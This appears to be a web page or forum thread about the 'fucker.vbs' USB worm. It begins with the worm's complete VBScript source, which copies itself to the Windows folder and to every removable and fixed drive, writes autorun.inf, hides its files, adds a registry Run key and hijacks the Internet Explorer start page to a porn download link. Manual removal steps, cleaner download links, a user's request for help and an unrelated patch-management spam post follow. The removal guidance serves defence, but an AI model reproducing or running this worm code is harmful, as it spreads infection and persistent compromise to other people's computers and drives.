Script autorun.inf
'My name is Keith From Webchat
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe fucker.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\fucker.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\fucker.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\fucker.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\fucker.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\fucker.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\fucker.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Fucker",winpath&"\fucker.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://sexe.athost.net/Sex.zip"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Malaysian Hackers"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
[autorun]HOW TO REMOVE FUCKER.VBS
shellexecute=wscript.exe fucker.vbs
Step 1
1. Start menu
2. Go Run (type msconfig in the box)
3. Click on Startup and search service like in picture in figure 1.2.Then remove mark symbol from the box that write fucker.
4. After that click Apply and Ok .
5. And then click Exit Without Restart .
Step 2
1. Go to My Computer .
2. Click on Tool.
3. Click on Folder Option
4. Click on View and then put mark on Show hidden file and folders. See figure 2.2.
5. And remove any mark on.
- Hide extensions for known file types.
- Hide protected operating system files (recommended).
- Launch folder windows in a separate process.
Step 3.
1. Now you click right on drive c/d (etc. all of drive) and chose Open.
2. And now you can see all hidden file and file that you going to remove
-Autorun.inf
-Fucker.vbs
3. And now remove this 2 file by used Shift + Delete key.
4. And check all drive that can’t open bye double click and delete this 2 file.
Step 4.
1. Download ccleaner http://rapidshareict.blogspot.com/2007/05/remover-fucker-vbs.html
2. Run this on your system.
3. Restart.
For repair Internet Explorer read in : http://bambangoke.blogspot.com/2007/05/virus-fuckervbs.html
i have tried the methods given but when i try to delete the file fucker.vbs file, it says that it s been use by another program. Please help me to get rid of this virus
you can download CCleaner in
-Portable :
http://rapidshare.com/files/30989878/PortableCCleaner1.39.502.rar
-Setup + readme :
http://rapidshare.com/files/30989877/Ccleaner139_readme.rar
Can anyone recommend the best Patch Management system for a small IT service company like mine? Does anyone use Kaseya.com or GFI.com? How do they compare to these guys I found recently: [url=http://www.n-able.com] N-able N-central performance management
[/url] ? What is your best take in cost vs performance among those three? I need a good advice please... Thanks in advance!